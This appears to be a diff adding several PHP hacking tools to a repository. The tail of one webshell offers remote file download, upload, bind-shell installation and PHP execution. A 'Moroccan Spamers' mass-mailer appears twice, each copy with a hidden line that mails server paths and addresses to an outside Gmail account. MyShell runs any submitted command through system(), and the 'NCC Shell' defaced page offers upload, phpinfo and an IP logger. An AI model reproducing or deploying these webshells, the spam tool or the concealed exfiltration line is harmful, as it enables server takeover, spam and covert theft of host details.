+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>into:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+
+<table id=tb><tr><td>
+Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>Install bind
+<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
+
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
+<table id=tb><tr><td>File to edit:
+<input type=\"text\" name=\"editfile\" ></td><td>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
+?>
+</td></tr></table>
+
+
+</td></tr>
+<tr valign="BOTTOM">
+<td valign=bottom>
+
+
+<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
+
+
+</td>
+</tr>
+</table>
+

php/Moroccan Spamers Ma-EditioN By GhOsT.php

@@ -0,0 +1,182 @@
+<? 
+if ($action=="send"){ 
+$message = urlencode($message); 
+$message = ereg_replace("%5C%22", "%22", $message); 
+$message = urldecode($message); 
+$message = stripslashes($message); 
+$subject = stripslashes($subject); 
+} 
+
+?> 
+<form name="form1" method="post" action="" enctype="multipart/form-data"> 
+<div align="center"> 
+<center> 
+<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1"> 
+<tr> 
+<td width="100%"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> 
+<tr> 
+<td width="100%"> 
+<p align="center"><div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277"> 
+<tr> 
+<td width="100%" height="272"> 
+<table width="769" border="0" height="303"> 
+<tr> 
+<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28"> 
+<p align="center"><b><font face="Tahoma" size="2" color="#FF6600">  Moroccan Spamers Ma-EditioN By GhOsT </font></b></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Email:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Name:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="text" name="realname" value="<? print $realname; ?>" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+File:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="file" name="file" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div> 
+</td> 
+<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="subject" value="<? print $subject; ?>" size="59" style="float: left"> 
+</font></td> 
+</tr> 
+<tr valign="top"> 
+<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top"> 
+<div align="left"> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4"> 
+<tr> 
+<td width="100%"> 
+<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea> 
+<br> 
+<input type="radio" name="contenttype" value="plain" checked> 
+<font size="2" face="Tahoma">Plain</font> 
+<input type="radio" name="contenttype" value="html"> 
+<font size="2" face="Tahoma">HTML</font> 
+<input type="hidden" name="action" value="send"> 
+<input type="submit" value="Send Message"> 
+</td> 
+</tr> 
+</table> 
+</div> 
+</td> 
+<td width="317" bgcolor="#CCCCCC" height="187" valign="top"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3"> 
+<tr> 
+<td width="100%"> 
+<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> 
+</font><br> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+<div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0"> 
+<tr> 
+<td width="100%" valign="top" height="1"> 
+<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by: 
+ v1.5</font></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</form> 
+
+<? 
+if ($action=="send"){ 
+
+if (!$from && !$subject && !$message && !$emaillist){ 
+print "Please complete all fields before sending your message."; 
+exit; 
+} 
+
+$allemails = split("\n", $emaillist); 
+$numemails = count($allemails); 
+
+#Open the file attachment if any, and base64_encode it for email transport 
+If ($file_name){ 
+@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); 
+$content = fread(fopen($file,"r"),filesize($file)); 
+$content = chunk_split(base64_encode($content)); 
+$uid = strtoupper(md5(uniqid(time()))); 
+$name = basename($file); 
+} 
+
+for($x=0; $x<$numemails; $x++){ 
+$to = $allemails[$x]; 
+if ($to){ 
+$to = ereg_replace(" ", "", $to); 
+$message = ereg_replace("&email&", $to, $message); 
+$subject = ereg_replace("&email&", $to, $subject); 
+print "Sending mail to $to....... "; 
+flush(); 
+$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; 
+$header .= "MIME-Version: 1.0\r\n"; 
+If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+$header .= "Content-Type: text/$contenttype\r\n"; 
+$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 
+$header .= "$message\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 
+If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 
+If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+If ($file_name) $header .= "$content\r\n"; 
+If ($file_name) $header .= "--$uid--"; 
+mail($to, $subject, "", $header); 
+print "Spamed'><br>"; 
+flush(); 
+} 
+} 
+
+} 
+?>
+
+
+
+
+
+
+

php/Moroccan_Spamers_Ma-EditioN_By_GhOsT.php

@@ -0,0 +1,182 @@
+<? 
+if ($action=="send"){ 
+$message = urlencode($message); 
+$message = ereg_replace("%5C%22", "%22", $message); 
+$message = urldecode($message); 
+$message = stripslashes($message); 
+$subject = stripslashes($subject); 
+} 
+
+?> 
+<form name="form1" method="post" action="" enctype="multipart/form-data"> 
+<div align="center"> 
+<center> 
+<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1"> 
+<tr> 
+<td width="100%"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> 
+<tr> 
+<td width="100%"> 
+<p align="center"><div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277"> 
+<tr> 
+<td width="100%" height="272"> 
+<table width="769" border="0" height="303"> 
+<tr> 
+<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28"> 
+<p align="center"><b><font face="Tahoma" size="2" color="#FF6600">  Moroccan Spamers Ma-EditioN By GhOsT </font></b></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Email:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Name:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="text" name="realname" value="<? print $realname; ?>" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+File:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="file" name="file" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div> 
+</td> 
+<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="subject" value="<? print $subject; ?>" size="59" style="float: left"> 
+</font></td> 
+</tr> 
+<tr valign="top"> 
+<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top"> 
+<div align="left"> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4"> 
+<tr> 
+<td width="100%"> 
+<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea> 
+<br> 
+<input type="radio" name="contenttype" value="plain" checked> 
+<font size="2" face="Tahoma">Plain</font> 
+<input type="radio" name="contenttype" value="html"> 
+<font size="2" face="Tahoma">HTML</font> 
+<input type="hidden" name="action" value="send"> 
+<input type="submit" value="Send Message"> 
+</td> 
+</tr> 
+</table> 
+</div> 
+</td> 
+<td width="317" bgcolor="#CCCCCC" height="187" valign="top"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3"> 
+<tr> 
+<td width="100%"> 
+<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> 
+</font><br> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+<div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0"> 
+<tr> 
+<td width="100%" valign="top" height="1"> 
+<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by: 
+ v1.5</font></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</form> 
+
+<? 
+if ($action=="send"){ 
+
+if (!$from && !$subject && !$message && !$emaillist){ 
+print "Please complete all fields before sending your message."; 
+exit; 
+} 
+
+$allemails = split("\n", $emaillist); 
+$numemails = count($allemails); 
+
+#Open the file attachment if any, and base64_encode it for email transport 
+If ($file_name){ 
+@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); 
+$content = fread(fopen($file,"r"),filesize($file)); 
+$content = chunk_split(base64_encode($content)); 
+$uid = strtoupper(md5(uniqid(time()))); 
+$name = basename($file); 
+} 
+
+for($x=0; $x<$numemails; $x++){ 
+$to = $allemails[$x]; 
+if ($to){ 
+$to = ereg_replace(" ", "", $to); 
+$message = ereg_replace("&email&", $to, $message); 
+$subject = ereg_replace("&email&", $to, $subject); 
+print "Sending mail to $to....... "; 
+flush(); 
+$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; 
+$header .= "MIME-Version: 1.0\r\n"; 
+If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+$header .= "Content-Type: text/$contenttype\r\n"; 
+$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 
+$header .= "$message\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 
+If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 
+If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+If ($file_name) $header .= "$content\r\n"; 
+If ($file_name) $header .= "--$uid--"; 
+mail($to, $subject, "", $header); 
+print "Spamed'><br>"; 
+flush(); 
+} 
+} 
+
+} 
+?>
+
+
+
+
+
+
+

php/MyShell.php

@@ -0,0 +1,304 @@
+<?php
+/*
+  **************************************************************
+  *                        MyShell                             *
+  **************************************************************
+  $Id: shell.php,v 1.0.5 2001/09/08 09:28:42 digitart Exp $
+
+  An interactive PHP-page that will execute any command entered.
+  See the files README and INSTALL or http://www.digitart.net  for
+  further information.
+  Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx>
+  based on the original program phpShell by Martin Geisler
+
+  This program is free software; you can redistribute it and/or
+  modify it under the terms of the GNU General Public License
+  as published by the Free Software Foundation; either version 2
+  of the License, or (at your option) any later version.
+
+  This program is distributed in the hope that it will be useful,
+  but WITHOUT ANY WARRANTY; without even the implied warranty of
+  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+  GNU General Public License for more details.
+
+  You can get a copy of the GNU General Public License from this
+  address: http://www.gnu.org/copyleft/gpl.html#SEC1
+  You can also write to the Free Software Foundation, Inc., 59 Temple
+  Place - Suite 330, Boston, MA  02111-1307, USA.
+*/
+
+
+#$selfSecure Enable auto authenticate feature. This must be 0 in order to
+#use .htaccess file to control access to MyShell, otherwise let it as 1
+#and set up your user and password using $shellUser and $shellPswd.
+#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
+#ACCESS TO THE SCRIPT.
+
+$selfSecure = 1;
+$shellUser  = "root";
+$shellPswd  = "myshell";
+
+#$adminEmail is the email address to send warning notifications in case
+#someone tries to access the script and fails to provide correct user and
+#password. This only works if you have $selfSecure enabeled.
+
+$adminEmail = "youremail@yourserver.com";
+
+#$fromEmail is the email address warning messages are sended from.
+#This is set for default to the server admin, but you can change
+#to any address you want i.e.: noreplay@yourdomain.com
+#This only works if you have $selfSecure enabeled.
+
+$fromEmail  = $HTTP_SERVER_VARS["SERVER_ADMIN"];
+
+#$dirLimit is the top directory allowed to change to using cd command
+#or the form selector. Any attempt to change to a directory up this
+#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
+#It is a good practice to set it to $DOCUMENT_ROOT using:
+#$dirLimit = $DOCUMENT_ROOT;
+#If you want to have access to all server directories leave it blank.
+#WARNING: Althought a user won't be able to snoop on directories above
+#this level using MyShell, he/she will still be able to excecute
+#commands on any directory where Webserver has permisson,
+#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
+
+$dirLimit = "";
+
+#$autoErrorTrap Enable automatic error traping if command returns error.
+#Bear in mind that MyShell executes the command again in order to
+#trap the stderr. This shouldn't be a problem in most cases.
+#If you turn it off, you'll have to select to trap stderr or not for
+#every command you excecute.
+
+$autoErrorTrap = 1;
+
+#Cosmetic defaults.
+
+$termCols     = 80;            //Default width of the output text area
+$termRows     = 20;            //Default heght of the output text area
+$bgColor      = "#000000";     //background color
+$bgInputColor = "#333333";     //color of the input field
+$outColor     = "#00BB00";     //color of the text output from the server
+$textColor    = "#009900";     //color of the hard texts of the terminal
+$linkColor    = "#00FF00";     //color of the links
+
+/************** No customize needed from this point *************/
+
+$MyShellVersion = "MyShell 1.0.5 build 20010910";
+if($selfSecure){
+    if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
+       Header('WWW-Authenticate: Basic realm="MyShell"');
+       Header('HTTP/1.0 401 Unauthorized');
+       echo "<html>
+         <head>
+         <title>MyShell error - Access Denied</title>
+         </head>
+         <h1>Access denied</h1>
+         A warning message have been sended to the administrator
+         <hr>
+         <em>$MyShellVersion</em>";
+       if(isset($PHP_AUTH_USER)){
+          $warnMsg ="
+ This is $MyShellVersion
+ installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
+ just to let you know that somebody tryed to access
+ the script using wrong username or password:
+ 
+ Date: ".date("Y-m-d H:i:s")."
+ IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
+ User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
+ username used: $PHP_AUTH_USER
+ password used: $PHP_AUTH_PW
+ 
+ If this is not the first time it happens,
+ please consider either to remove MyShell
+ from your system or change it's name or
+ directory location on your server.
+ 
+ Regards
+ The MyShell dev team
+       ";
+          mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
+          "From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
+       }
+       exit;
+    }
+}
+
+if(!$oCols)$oCols=$termCols;
+if(!$oRows)$oRows=$termRows;
+?>
+<html>
+<head>
+<title>MyShell</title>
+<style>
+body{
+	background-color: <?echo $bgColor ?>;
+	font-family : sans-serif;
+	font-size : 10px;
+	scrollbar-face-color: #666666;
+	scrollbar-shadow-color:  <?echo $bgColor ?>;
+	scrollbar-highlight-color: #999999;
+	scrollbar-3dlight-color:  <?echo $bgColor ?>;
+	scrollbar-darkshadow-color:  <?echo $bgColor ?>;
+	scrollbar-track-color:  <?echo $bgInputColor ?>;
+	scrollbar-arrow-color:  <?echo $textColor ?>;
+}
+input,select,option{
+	background-color: <?echo $bgInputColor ?>;
+	color : <?echo $outColor ?>;
+	border-style : none;
+	font-size : 10px;
+}
+textarea{
+	background-color: <?echo $bgColor ?>;
+	color : <?echo $outColor ?>;
+	border-style : none;
+}
+</style>
+</head>
+<body bgcolor=<?echo $bgColor ?> TEXT=<?echo $textColor ?> LINK=<?echo $linkColor ?> VLINK=<?echo $linkColor ?> onload=document.shell.command.select()>
+<?php
+// First we check if there has been asked for a working directory.
+if (isset($work_dir)) {
+  //A workdir has been asked for - we chdir to that dir.
+  $work_dir = validate_dir($work_dir);
+  @chdir($work_dir) or
+      ($dirError = "Can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
+  $work_dir = exec("pwd");
+}
+else{
+  /* No work_dir - we chdir to $DOCUMENT_ROOT */
+  $work_dir = validate_dir($DOCUMENT_ROOT);
+  chdir($work_dir);
+  $work_dir = exec("pwd");
+}
+
+//Handling cd command
+$cdPos = strpos($command,"cd ");
+if ((string)$cdPos != "") {
+    $cdPos=$cdPos+3;
+    $path = substr($command,$cdPos);
+    if ($path==".."){
+         $work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
+         if ($work_dir == "") $work_dir = "/";
+    }
+    elseif (substr($path,0,1)=="/")$work_dir=$path;
+    else $work_dir=$work_dir."/".$path;
+    $work_dir = validate_dir($work_dir);
+    @chdir($work_dir) or ($dirError = "Can't change directory. Directory does not exist or permission denied");
+    $work_dir = exec("pwd");
+    $commandBk = $command;
+    $command = "";
+}
+?>
+
+<form name="shell" method="post">
+Current working directory: <b>
+<?
+$work_dir_splitted = explode("/", substr($work_dir, 1));
+echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
+if ($work_dir_splitted[0] == "") {
+  $work_dir = "/";  /* Root directory. */
+}
+else{
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    /*  echo "i = $i";*/
+    $url .= "/".$work_dir_splitted[$i];
+    echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/";
+  }
+}
+?>
+</b>
+<br>
+<textarea cols="<? echo $oCols ?>" rows="<? echo $oRows ?>" readonly>
+<?
+echo $dirError;
+if ($command) {
+  if ($stderr) {
+    system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+  elseif (substr($command,0,3) == "man"){
+      exec($command,$man);
+      $rows=count($man);
+      $codes = ".".chr(8);
+      $manual = "";
+      for ($i=0;$i<$rows;$i++){
+          $manual.=$man[$i]."\n";
+      }
+      echo ereg_replace($codes,"",$manual);
+  }
+  else {
+    $ok = system($command,$status);
+    if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+}
+if ($commandBk) $command = $commandBk;
+?>
+</textarea>
+<br>
+<br>
+Command:
+<input type="text" name="command" size="80" <? if ($command && $echoCommand) { echo "value=\"$command\"";} ?> > <input name="submit_btn" type="submit" value="Go!">
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+<?
+if ($autoErrorTrap) echo "Auto error traping enabled";
+else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";
+?>
+<br>Working directory:
+<select name="work_dir" onChange="this.form.submit()">
+<?
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == ".") {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == "..") {
+      /* We have found the parent dir. We must be carefull if the parent
+         directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+        /* work_dir is only 1 charecter - it can only be / */
+      } elseif (strrpos($work_dir, "/") == 0) {
+        /* The last / in work_dir were the first charecter.
+           This means that we have a top-level directory
+           eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+         directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == "/") {
+        echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+        echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+  closedir($dir_handle);
+?>
+</select>
+&nbsp; | &nbsp;<input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands
+&nbsp; | &nbsp;Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>>
+&nbsp;Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>>
+&nbsp;| ::::::::::&nbsp;<a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> &copy;2001 Digitart Producciones</a>
+</form>
+</body>
+</html>
+<?
+function validate_dir($dir){
+    GLOBAL $dirLimit;
+    if($dirLimit){
+        $cdPos = strpos($dir,$dirLimit);
+        if ((string)$cdPos == "") {
+            $dir = $dirLimit;
+            $GLOBALS["dirError"] = "You are not allowed change to directories above $dirLimit\n";
+        }
+    }
+    return $dir;
+}
+?>

php/NCC-Shell.php

@@ -0,0 +1,60 @@
+<center>
+<h1>.:NCC:. Shell v1.0.0</h1>
+<title>.:NCC:. Shell v1.0.0</title>
+<head><h2>Hacked by Silver</h2></head>
+<h1>---------------------------------------------------------------------------------------</h1><br>
+<b><font color=red>---Server Info---</font></b><br>
+<?php
+echo "<b><font color=red>Safe Mode on/off:  </font></b>";
+// Check for safe mode
+if( ini_get('safe_mode') ) {
+  print '<font color=#FF0000><b>Safe Mode ON</b></font>';
+} else {
+  print '<font color=#008000><b>Safe Mode OFF</b></font>';
+}
+echo "</br>";
+echo "<b><font color=red>Momentane Directory:  </font></b>"; echo $_SERVER['DOCUMENT_ROOT'];
+echo "</br>";
+echo "<b><font color=red>Server: </font></b><br>"; echo $_SERVER['SERVER_SIGNATURE'];
+echo "<a href='$php_self?p=info'>PHPinfo</a>";
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+?>
+<h1>---------------------------------------------------------------------------</h1><br>
+<h2>- Upload -</h2>
+<title>Upload - Shell/Datei</title>
+<form
+ action="<?php echo $_SERVER['PHP_SELF']; ?>"
+ method="post"
+ enctype="multipart/form-data">
+<input type="file" name="Upload" />
+<input type="submit" value="Upload!" />
+</form>
+<hr />
+<?php
+
+ if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
+   // Alternativ:            and   $_FILES['probe']['size']
+   move_uploaded_file($_FILES['probe']['tmp_name'], "./dingen.php");
+   printf("Die Datei %s wurde als dingen.php hochgeladen.<br />\n",
+     $_FILES['probe']['name']);
+   printf("Sie ist %u Bytes groß und vom Typ %s.<br />\n",
+     $_FILES['probe']['size'], $_FILES['probe']['type']);
+ }
+?>
+<h1>---------------------------------------------------------------------------</h1><br>
+<h2>IpLogger</h2>
+<?php
+echo "<b><font color=red><br>IP: </font></b>"; echo $_SERVER['REMOTE_ADDR'];
+echo "<b><font color=red><br>PORT: </font></b>"; echo $_SERVER['REMOTE_PORT'];
+echo "<b><font color=red><br>BROWSER: </font></b>"; echo $_SERVER[HTTP_REFERER];
+echo "<b><font color=red><br>REFERER: </font></b>"; echo $_SERVER['HTTP_USER_AGENT'];
+?>
+<h1>---------------------------------------------------------------------------</h1><br>
+<h2>Directory Lister</h2>
